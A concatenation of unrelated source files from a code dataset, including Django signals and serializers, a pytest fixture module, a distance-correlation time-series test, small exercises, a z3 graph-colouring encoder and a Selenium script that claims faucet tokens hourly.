if(created):\n for u in instance.user.friends.all().exclude(id=instance.user.id):\n Notification(category='Schedule', content=instance.user.first_name+' saved a new schedule named \\''+instance.title+'\\'!', seen=False, to_user=u).save()\n else:\n for u in instance.user.friends.all().exclude(id=instance.user.id):\n Notification(category='Schedule', content=instance.user.first_name+' modified the schedule named \\''+instance.title+'\\'!', seen=False, to_user=u).save()\n\ndef save_user(sender, instance, created, **kwargs):\n if(created):\n Preference(user=instance, earliest_class_time='07:30:00', latest_class_time='21:00:00', break_length=15, min_courses=0, max_courses=10).save()\n\ndef save_preference(sender, instance, **kwargs):\n if(instance.earliest_class_time != None):\n for u in instance.user.friends.all().exclude(id=instance.user.id):\n Notification(category='Friend', content=instance.user.first_name+' modified their preferences!', seen=False, to_user=u).save()\n\ndef save_courseoffering(sender, instance, **kwargs):\n def checkCourseExists(schedule, offering):\n for s in schedule:\n if(s == offering):\n return True\n return False\n if(instance.max_enrolled == instance.current_enrolled):\n for s in Schedule.objects.all():\n if(checkCourseExists(s.courseOfferings.all(), instance)):\n Notification(category='Schedule', content=instance.course.course_code+' in schedule \\''+s.title+'\\' is now full!', seen=False, to_user=s.user).save()","sub_path":"api/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"436304317","text":"#import django\n#django.setup()\nfrom gestione.models import IDcod,Carico,Genere,Saldo,ExCsBl,Produttore\nfrom 
django.db.models import Q\nfrom decimal import Decimal\nimport re\nimport sys\nimport io\n\nclass CreateData:\n \n def EntrataBolla(self,ls,bl,bl1,dt,facc,tras,vari,cl):\n rec=0\n cnt=0\n i=0\n before=\" \"\n tot=0\n totcss=0\n pssum=0\n csssum=0\n cssexitsum=0\n line= sorted(ls, key=lambda k: k['cod']) \n seg=line[0][\"cod\"].split('-')\n pc=Carico.objects.filter(Q(bolla=bl),Q(idcod__produttore__id=cl))\n pc1=Carico.objects.filter(Q(bolla=bl1),Q(idcod__produttore__id=cl))\n if (pc1):\n if(bl!=bl1):\n return 3\n for item in line:\n pssum+=Decimal(item[\"ps\"])\n csssum+=int(item[\"css\"])\n \n if(pc):\n p=pc.filter().values(\"qn\",\"cassa\",\"cassaexit\",\"idcod__id\",\"data\",\"excsbl__id\")\n o=p[0][\"qn\"]\n o1=p[0][\"excsbl__id\"]\n rec=ExCsBl.objects.get(id=o1)\n rec.facc=Decimal(facc)\n rec.trasporto=Decimal(tras)\n rec.vari=Decimal(vari)\n rec.qn=pssum\n rec.cassa=csssum\n rec.bolla=bl1\n rec.data=dt\n rec.save()\n data=list(p)\n pc.delete()\n dt=data[0][\"data\"]\n cnt=1\n s=Saldo.objects.all()\n cod=IDcod.objects.all()\n \n for item in line:\n if(item[\"tara\"]==\"\"):\n item[\"tara\"]=-1\n diff=int(item[\"css\"])\n csx=0\n try:\n for itemp in data:\n if (int(item[\"id\"])==int(itemp[\"idcod__id\"])):\n csx=int(itemp[\"cassaexit\"])\n diff=int(item[\"css\"])-int(itemp[\"cassa\"])\n except:\n data=\"\"\n s1=s.get(idcod_id=item[\"id\"])\n qs=s1.q\n s1.q=qs+diff\n s1.save()\n codid=cod.get(id=item[\"id\"])\n prd=Produttore.objects.get(id=cl)\n if(cnt==0):\n rec=ExCsBl(produttore=prd,data=dt,bolla=bl1,facc=Decimal(facc),trasporto=Decimal(tras),vari=Decimal(vari),qn=pssum,cassa=csssum)\n rec.save() \n rec1=Carico(excsbl=rec,tara=item[\"tara\"],qn=item[\"ps\"],cassa=item[\"css\"],bolla=bl1,idcod=codid,data=dt,cassaexit=csx)\n rec1.save()\n cnt=1\n return 2 \n \n ","sub_path":"Magazzino/Creazione/MCreateTable.py","file_name":"MCreateTable.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"313948772","text":"import os\nimport stat\nfrom distutils.dir_util import copy_tree, remove_tree\nimport tarfile\nimport tempfile\nfrom types import TracebackType\nfrom typing import List, Optional, Type\nimport pytest\nfrom pygit2 import Repository, init_repository\nfrom battenberg.core import Battenberg\n\n\nclass TemporaryRepository:\n \"\"\"\n Constructs a git repo from the tests/data/testrepo.tar file in the /tmp directory.\n\n Taken from pygit2 tests: https://github.com/libgit2/pygit2/blob/master/test/utils.py\n \"\"\"\n\n def __enter__(self) -> 'TemporaryRepository':\n name = 'testrepo'\n repo_path = os.path.join(os.path.dirname(__file__), 'data', f'{name}.tar')\n self.temp_dir = tempfile.mkdtemp()\n temp_repo_path = os.path.join(self.temp_dir, name)\n tar = tarfile.open(repo_path)\n tar.extractall(self.temp_dir)\n tar.close()\n return temp_repo_path\n\n def __exit__(self, type: Optional[Type[BaseException]], value: Optional[BaseException],\n traceback: TracebackType):\n if os.path.exists(self.temp_dir):\n remove_tree(self.temp_dir)\n\n\n@pytest.fixture\ndef repo() -> Repository:\n with TemporaryRepository() as repo_path:\n yield Repository(repo_path)\n\n\ndef copy_template(repo: Repository, name : str, commit_message: str, parents: List[str] = None) -> str:\n template_path = os.path.join(os.path.dirname(__file__), 'data', name)\n # Use distuils implementation instead of shutil to allow for copying into\n # a destination with existing files. 
See: https://stackoverflow.com/a/31039095/724251\n copy_tree(template_path, repo.workdir)\n\n # Stage the template changes\n repo.index.add_all()\n repo.index.write()\n tree = repo.index.write_tree()\n # Construct a commit with the staged changes.\n return repo.create_commit(\n None,\n repo.default_signature,\n repo.default_signature,\n commit_message,\n tree,\n parents or []\n )\n\n\n@pytest.fixture\ndef template_repo() -> Repository:\n repo_path = tempfile.mkdtemp()\n repo = init_repository(repo_path, initial_head='main')\n\n # Copy template contents into a temporary repo for each test.\n main_commit_id = copy_template(repo, 'template', 'Prepared template installation')\n repo.branches.local.create('main', repo[main_commit_id])\n repo.checkout('refs/heads/main')\n\n # Construct a new \"upgrade\" branch which battenberg can target during upgrade.\n upgrade_commit_id = copy_template(\n repo,\n 'upgrade-template',\n 'Prepared upgrade-template installation',\n parents=[main_commit_id]\n )\n repo.branches.local.create('upgrade', repo[upgrade_commit_id])\n\n return repo\n\n\n@pytest.fixture\ndef installed_repo(repo: Repository, template_repo: Repository) -> Repository:\n battenberg = Battenberg(repo)\n battenberg.install(template_repo.workdir, no_input=True)\n return repo\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"343877625","text":"from ..independence import Dcorr\nfrom ._utils import _CheckInputs, compute_stat\nfrom .base import TimeSeriesTest\n\n\nclass DcorrX(TimeSeriesTest):\n r\"\"\"\n Class for running the DcorrX test for independence of time series.\n\n DcorrX is an independence test between two (paired) time series of\n not necessarily equal dimensions. The population parameter is 0 if and only if the\n time series are independent. It is based upon energy distance between distributions.\n\n Parameters\n ----------\n compute_distance : callable(), optional (default: \"euclidean\")\n A function that computes the distance among the samples within each\n data matrix.\n Valid strings for ``metric`` are, as defined in\n ``sklearn.metrics.pairwise_distances``,\n\n - From scikit-learn: [‘cityblock’, ‘cosine’, ‘euclidean’, ‘l1’, ‘l2’,\n ‘manhattan’] See the documentation for scipy.spatial.distance for details\n on these metrics.\n - From scipy.spatial.distance: [‘braycurtis’, ‘canberra’, ‘chebyshev’,\n ‘correlation’, ‘dice’, ‘hamming’, ‘jaccard’, ‘kulsinski’, ‘mahalanobis’,\n ‘minkowski’, ‘rogerstanimoto’, ‘russellrao’, ‘seuclidean’,\n ‘sokalmichener’, ‘sokalsneath’, ‘sqeuclidean’, ‘yule’] See the\n documentation for scipy.spatial.distance for details on these metrics.\n\n Set to `None` or `precomputed` if `x` and `y` are already distance\n matrices. To call a custom function, either create the distance matrix\n before-hand or create a function of the form ``metric(x, **kwargs)``\n where `x` is the data matrix for which pairwise distances are\n calculated and kwargs are extra arguements to send to your custom function.\n\n max_lag : int, optional (default: 0)\n The maximum number of lags in the past to check dependence between `x` and the\n shifted `y`. 
Also the :math:`M` hyperparameter below.\n\n    See Also\n    --------\n    Dcorr: Distance correlation test statistic and p-value.\n    MGCX : Cross multiscale graph correlation test statistic and p-value.\n\n    Notes\n    -----\n    The statistic can be derived as follows [#1DcorX]_:\n\n    Let :math:`x` and :math:`y` be :math:`(n, p)` and :math:`(n, q)` series\n    respectively, which each contain :math:`n` observations of the series\n    :math:`(X_t)` and :math:`(Y_t)`. Similarly, let :math:`x[j:n]` be the\n    :math:`(n-j, p)` last :math:`n-j` observations of :math:`x`. Let :math:`y[0:(n-j)]`\n    be the :math:`(n-j, q)` first :math:`n-j` observations of :math:`y`. Let :math:`M`\n    be the maximum lag hyperparameter. The cross distance correlation is,\n\n    .. math::\n\n        DcorrX_n (x, y) = \\sum_{j=0}^M \\frac{n-j}{n}\n                          Dcorr_n (x[j:n], y[0:(n-j)])\n\n    References\n    ----------\n    .. [#1DcorX] Mehta, R., Chung, J., Shen C., Xu T., Vogelstein, J. T. (2019).\n        A Consistent Independence Test for Multivariate Time-Series.\n        ArXiv\n    \"\"\"\n\n    def __init__(self, compute_distance=\"euclidean\", max_lag=0, **kwargs):\n        TimeSeriesTest.__init__(\n            self, compute_distance=compute_distance, max_lag=max_lag, **kwargs\n        )\n\n    def _statistic(self, x, y):\n        r\"\"\"\n        Helper function that calculates the DcorrX test statistic.\n\n        Parameters\n        ----------\n        x, y : ndarray\n            Input data matrices. `x` and `y` must have the same number of\n            samples. That is, the shapes must be `(n, p)` and `(n, q)` where\n            `n` is the number of samples and `p` and `q` are the number of\n            dimensions. Alternatively, `x` and `y` can be distance matrices,\n            where the shapes must both be `(n, n)`.\n\n        Returns\n        -------\n        stat : float\n            The computed DcorrX statistic.\n        opt_lag : int\n            The computed optimal lag.\n        \"\"\"\n        stat, opt_lag = compute_stat(\n            x, y, Dcorr, self.compute_distance, self.max_lag, **self.kwargs\n        )\n        self.stat = stat\n        self.opt_lag = opt_lag\n\n        return stat, opt_lag\n\n    def test(self, x, y, reps=1000, workers=1):\n        r\"\"\"\n        Calculates the DcorrX test statistic and p-value.\n\n        Parameters\n        ----------\n        x, y : ndarray\n            Input data matrices. `x` and `y` must have the same number of\n            samples. That is, the shapes must be `(n, p)` and `(n, q)` where\n            `n` is the number of samples and `p` and `q` are the number of\n            dimensions. Alternatively, `x` and `y` can be distance matrices,\n            where the shapes must both be `(n, n)`.\n        reps : int, optional (default: 1000)\n            The number of replications used to estimate the null distribution\n            when using the permutation test used to calculate the p-value.\n        workers : int, optional (default: 1)\n            The number of cores to parallelize the p-value computation over.\n            Supply -1 to use all cores available to the Process.\n        auto : bool (default: True)\n            Automatically uses fast approximation when sample size and size of array\n            is greater than 20. If True, and sample size is greater than 20, a fast\n            chi2 approximation will be run. 
Parameters ``reps`` and ``workers`` are\n irrelevant in this case.\n\n Returns\n -------\n stat : float\n The computed DcorrX statistic.\n pvalue : float\n The computed DcorrX p-value.\n dcorrx_dict : dict\n Contains additional useful returns containing the following keys:\n\n - opt_lag : int\n The optimal lag that maximizes the strength of the relationship.\n\n Examples\n --------\n >>> import numpy as np\n >>> from hyppo.time_series import DcorrX\n >>> np.random.seed(456)\n >>> x = np.arange(7)\n >>> y = x\n >>> stat, pvalue, dcorrx_dict = DcorrX().test(x, y, reps = 100)\n >>> '%.1f, %.2f, %d' % (stat, pvalue, dcorrx_dict['opt_lag'])\n '1.0, 0.01, 0'\n\n The increasing the max_lag can increase the ability to identify dependence.\n\n >>> import numpy as np\n >>> from hyppo.time_series import DcorrX\n >>> np.random.seed(1234)\n >>> x = np.random.permutation(10)\n >>> y = np.roll(x, -1)\n >>> stat, pvalue, dcorrx_dict = DcorrX(max_lag=1).test(x, y, reps=1000)\n >>> '%.1f, %.2f, %d' % (stat, pvalue, dcorrx_dict['opt_lag'])\n '1.1, 0.01, 1'\n \"\"\"\n check_input = _CheckInputs(\n x,\n y,\n max_lag=self.max_lag,\n )\n x, y = check_input()\n\n stat, pvalue, stat_list = super(DcorrX, self).test(x, y, reps, workers)\n dcorrx_dict = {\"opt_lag\": stat_list[1]}\n return stat, pvalue, dcorrx_dict\n","sub_path":"hyppo/time_series/dcorrx.py","file_name":"dcorrx.py","file_ext":"py","file_size_in_byte":6980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"245529467","text":"from rest_framework import serializers\nfrom .models import MedOrgType, MedOrgPrincipal\nfrom django_server.apps.org.models import MedSaleOpportunity\nfrom django_server.utils.translate import RELATION, SALE_OPPORTUNITY_STATE\nfrom django_server.apps.user.models import UserExtra\nfrom django_server.apps.operate.models import UserOrgRecentEvent, UserOrgRecentCooperation, UserOrgRecentGCBulletin\n\n\nclass MedTypeSerializer(serializers.Serializer):\n id = serializers.IntegerField()\n user = serializers.IntegerField(source='user.id', read_only=True)\n type_name = serializers.CharField()\n description = serializers.CharField()\n is_default = serializers.BooleanField()\n created_at = serializers.DateTimeField(format='%Y-%m-%d')\n org_count = serializers.SerializerMethodField()\n\n class Meta:\n fields = ('user', 'type', 'description', 'is_default', 'created_at')\n\n def get_org_count(self, obj):\n try:\n org_count = MedOrgType.objects.filter(type_id=obj.id).count()\n except Exception as e:\n org_count = 0\n return org_count\n\n\nclass MedOrgTypeSerializer(serializers.Serializer):\n id = serializers.IntegerField()\n user = serializers.IntegerField(source='user.id', read_only=True)\n type_id = serializers.IntegerField(source='type.id', read_only=True)\n type_name = serializers.CharField()\n state = serializers.CharField()\n org_type = serializers.CharField()\n org_uuid = serializers.CharField()\n created_at = serializers.DateTimeField(format='%Y-%m-%d')\n org_name = serializers.CharField()\n scholar_uuid = serializers.CharField()\n scholar_name = serializers.CharField()\n\n class Meta:\n fields = ('id', 'type_id', 'org', 'created_at', 'org_name')\n\n\nclass RelationCountSerializer(serializers.Serializer):\n relation = serializers.CharField()\n count = serializers.IntegerField()\n proportion = serializers.FloatField()\n\n class Meta:\n fields = ('relation', 'count', 'proportion')\n\n\nclass RelationSerializer(serializers.Serializer):\n user_id = serializers.IntegerField()\n org_uuid = 
serializers.UUIDField()\n org_name = serializers.CharField()\n org_type = serializers.CharField()\n user_name = serializers.SerializerMethodField()\n relation = serializers.CharField()\n activity_state = serializers.SerializerMethodField()\n new_message = serializers.SerializerMethodField()\n created_at = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S')\n\n class Meta:\n fields = ('user_name', 'activity_state', 'new_message')\n\n def get_activity_state(self, obj):\n try:\n state = MedOrgPrincipal.ACTIVITY_STATE_CHOICES[obj.activity_state]\n if obj.activity_state == MedOrgPrincipal.ACTIVITY_STATE_RELATION:\n state = state.format(RELATION[obj.relation])\n elif obj.activity_state == MedOrgPrincipal.ACTIVITY_STATE_UPDATE_SALE_OPPORTUNITY:\n user = self.context['request'].user\n entity = MedSaleOpportunity.objects.filter(user_id=user.id, org_uuid=obj.org_uuid, state='1').order_by('-updated_at')[0]\n state = state.format(SALE_OPPORTUNITY_STATE[entity.progress])\n return state\n except Exception as e:\n print(e)\n return '新负责'\n\n def get_user_name(self, obj):\n return UserExtra.objects.get(user_id=obj.user_id).name\n\n def get_new_message(self, obj):\n new_message = False\n if UserOrgRecentEvent.objects.filter(user_id=obj.user_id, org_uuid=obj.org_uuid, is_read=False).exists():\n new_message = True\n if UserOrgRecentCooperation.objects.filter(user_id=obj.user_id, org_uuid=obj.org_uuid, is_read=False).exists():\n new_message = True\n if UserOrgRecentGCBulletin.objects.filter(user_id=obj.user_id, org_uuid=obj.org_uuid, is_read=False).exists():\n new_message = True\n return new_message\n\n\nclass PrincipalOrgSerializer(serializers.Serializer):\n user_id = serializers.IntegerField()\n user_name = serializers.CharField(source='user.name')\n org_uuid = serializers.CharField()\n org_name = serializers.CharField()\n org_type = serializers.CharField()\n updated_at = serializers.SerializerMethodField()\n relation = serializers.SerializerMethodField()\n activity_state = serializers.SerializerMethodField()\n\n class Meta:\n fields = ('user_id', 'org_uuid', 'org_name', 'org_type', 'updated_at', 'relation', 'activity_state')\n\n def get_relation(self, obj):\n if hasattr(obj, 'relation'):\n return obj.relation\n return '5'\n\n def get_updated_at(self, obj):\n if hasattr(obj, 'updated_at'):\n return obj.updated_at\n return obj.created_at\n\n def get_activity_state(self, obj):\n if hasattr(obj, 'activity_state'):\n activity_state = obj.activity_state\n if activity_state == MedOrgPrincipal.ACTIVITY_STATE_RELATION:\n state = MedOrgPrincipal.ACTIVITY_STATE_CHOICES[activity_state].format(int(obj.relation)*20+20)\n return state\n if activity_state == MedOrgPrincipal.ACTIVITY_STATE_UPDATE_SALE_OPPORTUNITY:\n user = self.context['request'].user\n entity = MedSaleOpportunity.objects.filter(user_id=user.id, org_uuid=str(obj.org_uuid), state='1').order_by(\n '-updated_at')[0]\n state = MedOrgPrincipal.ACTIVITY_STATE_CHOICES[activity_state].format(SALE_OPPORTUNITY_STATE[entity.progress])\n return state\n return MedOrgPrincipal.ACTIVITY_STATE_CHOICES[activity_state]\n else:\n return '新关注'\n\n\nclass ManagePrincipalOrgSerializer(PrincipalOrgSerializer):\n new_message = serializers.SerializerMethodField()\n\n class Meta:\n fields = ('new_message',)\n\n def get_new_message(self, obj):\n new_message = False\n if UserOrgRecentEvent.objects.filter(user_id=obj.user_id, org_uuid=obj.org_uuid, is_read=False).exists():\n new_message = True\n if UserOrgRecentCooperation.objects.filter(user_id=obj.user_id, org_uuid=obj.org_uuid, 
is_read=False).exists():\n new_message = True\n if UserOrgRecentGCBulletin.objects.filter(user_id=obj.user_id, org_uuid=obj.org_uuid, is_read=False).exists():\n new_message = True\n return new_message\n\n\nclass NewAssignSerializer(serializers.Serializer):\n user_id = serializers.CharField()\n user_name = serializers.CharField(source='user.name')\n org_uuid = serializers.CharField()\n org_name = serializers.CharField()\n org_type = serializers.CharField()\n assign_user = serializers.SerializerMethodField()\n created_at = serializers.DateTimeField()\n\n class Meta:\n fields = ('org_uuid', 'org_name', 'org_type', 'created_at', 'boss_id')\n\n def get_assign_user(self, obj):\n try:\n ret = UserExtra.objects.filter(user_id=int(obj.assign_user)).values_list('name', flat=True)\n if ret:\n return ret[0]\n else:\n return None\n except Exception as e:\n return None\n\n\nclass ZoneListSerializer(serializers.Serializer):\n user_id = serializers.IntegerField()\n org_uuid = serializers.CharField()\n org_name = serializers.CharField()\n updated_at = serializers.DateTimeField()\n relation = serializers.CharField()\n org_type = serializers.CharField()\n activity_state = serializers.SerializerMethodField()\n\n def get_activity_state(self, obj):\n if hasattr(obj, 'activity_state'):\n activity_state = obj.activity_state\n if activity_state == MedOrgPrincipal.ACTIVITY_STATE_RELATION:\n state = MedOrgPrincipal.ACTIVITY_STATE_CHOICES[activity_state].format(int(obj.relation)*20+20)\n return state\n if activity_state == MedOrgPrincipal.ACTIVITY_STATE_UPDATE_SALE_OPPORTUNITY:\n user = self.context['request'].user\n entity = MedSaleOpportunity.objects.filter(user_id=user.id, org_uuid=str(obj.org_uuid), state='1').order_by(\n '-updated_at')[0]\n state = MedOrgPrincipal.ACTIVITY_STATE_CHOICES[activity_state].format(SALE_OPPORTUNITY_STATE[entity.progress])\n return state\n return MedOrgPrincipal.ACTIVITY_STATE_CHOICES[activity_state]\n return '新关注'\n","sub_path":"scripts/marketbox-medical-svr/django_server/apps/manage/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":8406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"471374928","text":"''' Kevin and Stuart want to play the 'The Minion Game'\n Game Rules:\n Both players are given the same string, $.\n Both players have to make substrings using the letters of the string $.\n Stuart has to make words starting with consonants.\n Kevin has to make words starting with vowels.\n The game ends when both players have made all possible substrings.\n\n Scoring:\n A player gets +1 point for each occurrence of the substring in the string $.\n For Example:\n String $ = BANANA\n Kevin's vowel beginning word = ANA\n Here, ANA occurs twice in BANANA. 
Hence, Kevin will get 2 Points.'''\n \nstr=input().strip()\nlist1=list(str)\nstring=''\nk=0\ns=0\nfor i in range(0,len(list1)):\n    if list1[i] in ['a','e','i','o','u','A','E','I','O','U']:\n        k=k+len(list1)-(i+1)+1\n    else:\n        s=s+len(list1)-(i+1)+1\nprint('\"Kevin count:\"',k,'\"\\nStuart count:\"',s)\nif k>s:\n    print('Kevin:',k)\nelif s>k:\n    print('Stuart:',s)\nelse:\n    print('Draw')\n \n \n\n","sub_path":"AboutGame.py","file_name":"AboutGame.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"570727515","text":"import sqlite3\nfrom tkinter import *\nfrom tkinter import messagebox as MessageBox\nfrom tkinter import simpledialog as SimpleDialog\n \ndef crear_db():\n    \n    conexion = sqlite3.connect('Menu_del_dia.db')\n    cursor = conexion.cursor()\n    try:\n        cursor.execute('''\n            CREATE TABLE categoria(\n                id INTEGER PRIMARY KEY AUTOINCREMENT,\n                nombre VARCHAR(100) UNIQUE NOT NULL\n            )\n        ''')\n    except sqlite3.OperationalError:\n        print(\"La Tabla de categoria ya existe\")\n\n\n    try:\n        cursor.execute('''\n            CREATE TABLE plato(\n                id INTEGER PRIMARY KEY AUTOINCREMENT,\n                nombre VARCHAR(100) UNIQUE NOT NULL,\n                categoria_id INTEGER NOT NULL,\n                menu INTEGER DEFAULT 0,\n                FOREIGN KEY(categoria_id) REFERENCES categoria(id)\n            )\n        ''')\n    except sqlite3.OperationalError:\n        print(\"La Tabla de Platos ya existe\")\n    \n\n    conexion.close()\n\n\n\n\ncrear_db() \n\n\n\n\n\n","sub_path":"projectos/Gestor restaurante/funcionalidad.py","file_name":"funcionalidad.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"523600893","text":"\n# functions for constructing a z3 cnf formula (a \"solver\") for\n# the 3-colorability problem.\n\nfrom z3 import *\nimport random\nfrom timeit import default_timer as timer\n\n\ncolors = [\"R\", \"G\", \"B\"]\n\n# two graphs g1 (3-colorable) and g2 (not 3-colorable)\n# Note: \"edge-list\" representation used\n\ng1 = [[\"a\", \"b\"],\n      [\"a\", \"c\"],\n      [\"a\", \"d\"],\n      [\"a\", \"e\"],\n      [\"b\", \"c\"],\n      [\"c\", \"d\"],\n      [\"d\", \"e\"],\n      [\"e\", \"b\"]\n      ]\n\ng2 = [[\"a\", \"b\"],\n      [\"a\", \"c\"],\n      [\"a\", \"d\"],\n      [\"a\", \"e\"],\n      [\"a\", \"f\"],\n      [\"b\", \"c\"],\n      [\"c\", \"d\"],\n      [\"d\", \"e\"],\n      [\"e\", \"f\"],\n      [\"f\", \"b\"]\n      ]\n\ndef gen_graph(nnodes, nedges):\n    edges = []\n\n    eset = set()\n\n    while nedges >= 0:\n        v = random.randint(1,nnodes)\n        if v > 1:\n            u = random.randint(1,v-1)\n            ustr = \"v\" + str(u)\n            vstr = \"v\" + str(v)\n            estr = ustr + vstr\n            if estr not in eset:\n                edges += [[ustr, vstr]]\n                nedges -= 1\n                eset.add(estr)\n    return edges\n\n# takes a list of z3 bool variables and generates a list of\n# clauses (for CNF) which are all true iff exactly one of the\n# variables is set to true\n# (handy little utility!)\ndef exactly_one(vars):\n    clauses = [vars] # at least one of the literals is true\n    # Now encode no more than one literal is true.\n    # Hint: there is no pair of literals such that both are true.\n    for i in range(len(vars)):\n        for j in range(i+1, len(vars)):\n            # xi->!xj\n            clauses += [[Not(vars[i]), Not(vars[j])]]\n    return clauses\n\n\n# takes an edge-list representation of a graph and\n# returns a list of distinct vertices\ndef nodes(graph):\n    nset = set()\n    nlist = []\n\n    for [u, v] in graph:\n        if u not in nset:\n            nlist += [u]\n            nset.add(u)\n        if v not in nset:\n            nlist += [v]\n            nset.add(v)\n    # could have just returned the set...\n    return nlist\n\n\n# generates a 
two-level dictionary:\n# vars[][] -> z3-variable\n# example: vars[\"u\"][\"G\"] is the \"green\" indicator variable\n# for vertex \"u\"\ndef variables(nodes):\n vars = {}\n for u in nodes:\n vars[u] = {}\n vars[u][\"R\"] = Bool(u + \"R\")\n vars[u][\"G\"] = Bool(u + \"G\")\n vars[u][\"B\"] = Bool(u + \"B\")\n return vars\n\n# generates the formula (\"solver\") which is satisfiable iff the\n# given graph is 3-colorable\ndef formula(graph):\n f = Solver()\n vars = variables(nodes(graph))\n\n # for each vertex u, generate clauses enforcing that\n # in any satisfying truth assignment, exactly one of\n # the three associated indicator variables (RGB) is\n # true (indicating the color assigned to u)\n for u in vars:\n uclauses = exactly_one([vars[u][\"R\"], vars[u][\"G\"], vars[u][\"B\"] ])\n for c in uclauses:\n f.add(Or(c))\n\n for [u, v] in graph:\n for c in colors:\n f.add(Or([ Not(vars[u][c]), Not(vars[v][c])]))\n return f\n\ndef run_exp(nnodes, nedges):\n g = gen_graph(nnodes, nedges)\n\n start = timer()\n\n f = formula(g)\n ans = f.check()\n\n f = formula(g)\n ans = f.check()\n\n f = formula(g)\n ans = f.check()\n\n f = formula(g)\n ans = f.check()\n\n f = formula(g)\n ans = f.check()\n\n end = timer()\n\n print(\"|V|=\" + str(nnodes) + \"; |E|=\" + str(nedges) +\n \"; ans=\" + str(ans) + \"; time=\" + str((end-start)/5.0))\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"298915445","text":"# Copyright 2017 Netflix, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport ast\nimport re\n\nfrom setuptools import find_packages, setup\n\nwith open(\"requirements.in\") as f:\n REQUIRED = f.read().splitlines()\n\n_version_re = re.compile(r\"__version__\\s+=\\s+(.*)\")\nwith open(\"repokid/__init__.py\", \"rb\") as f:\n REPOKID_VERSION = str(\n ast.literal_eval(_version_re.search(f.read().decode(\"utf-8\")).group(1))\n )\n\nsetup(\n name=\"repokid\",\n version=REPOKID_VERSION,\n description=\"AWS Least Privilege for Distributed, High-Velocity Deployment\",\n # removed as I think getting long_desc to work is perhaps outside the scope\n # of this PR, other long_desc's I've seen have used .rst to display on\n # Pypi, so I think that may be necessary also.\n # long_description=open(\"readme.md\").read(),\n url=\"https://github.com/Netflix/repokid\",\n packages=find_packages(),\n install_requires=REQUIRED,\n keywords=[\"aws\", \"iam\", \"access_advisor\"],\n entry_points={\n \"console_scripts\": [\n \"repokid = repokid.cli.repokid_cli:main\",\n \"dispatcher = repokid.cli.dispatcher_cli:main\",\n ]\n },\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: System Administrators\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Natural Language :: English\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python :: 3.7\",\n \"Topic :: 
Security\",\n \"Topic :: System\",\n \"Topic :: System :: Systems Administration\",\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"440144917","text":"# (c) Copyright 2009 Cloudera, Inc.\n#\n# AllTests for the stitch project\n\nimport sys\nimport unittest\n\nimport stitch.targets.packagetargettest as packagetargettest\n\ndef testSuite():\n dir_comp_suite = unittest.makeSuite(packagetargettest.CopyDirTest, 'test')\n\n alltests = unittest.TestSuite([dir_comp_suite,\n ])\n return alltests\n\nif __name__ == \"__main__\":\n runner = unittest.TextTestRunner()\n sys.exit(not runner.run(testSuite()).wasSuccessful())\n","sub_path":"src/stitch/alltests.py","file_name":"alltests.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"626332983","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By \nfrom selenium.common.exceptions import NoSuchElementException \nfrom selenium.webdriver.support.ui import WebDriverWait\nimport time\nfrom datetime import datetime\n\n\n# PATH where driver is saved\nPATH = \"C:\\Program Files (x86)\\chromedriver\"\n\ndriver = webdriver.Chrome(PATH)\ndriver.get(\"https://foobar.protonchain.com/\")\n\n\n\nconnect_wallet = driver.find_element(By.XPATH, '//button[text()=\"Connect Wallet\"]')\nconnect_wallet.click()\nprint(connect_wallet)\ntime.sleep(5)\n\n# CLick connect wallet\npro = driver.find_element_by_xpath(\"/html/body/div[3]/div/div[1]/div[2]/ul/li[1]/span\")\npro.click()\n\n# Wait for 15 sec - Time to scan the code and accept the popup in proton app\ntime.sleep(15) \n\nnumber = 1\n\n# For the first time, Get tokens will be clicked\n\ntoken = driver.find_element(By.XPATH, '//button[text()=\"Get tokens\"]')\ntoken.click()\nsleep_time=3610\nwhile True:\n now = datetime.now()\n current_time = now.strftime(\"%H:%M:%S\")\n print(\"Inside Loop: Try \" , number, \" time = \" , current_time )\n print(\"Sleeping for: \", sleep_time , \"s\")\n \n time.sleep(sleep_time)\n number = number+1\n # After inital click on Get tokens, Success button will be clicked every hour\n token_success = driver.find_element(By.XPATH, '//button[text()=\"Success!\"]')\n token_success.click()\n","sub_path":"foobar.py","file_name":"foobar.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"578484806","text":"import interface\nimport streamlit as 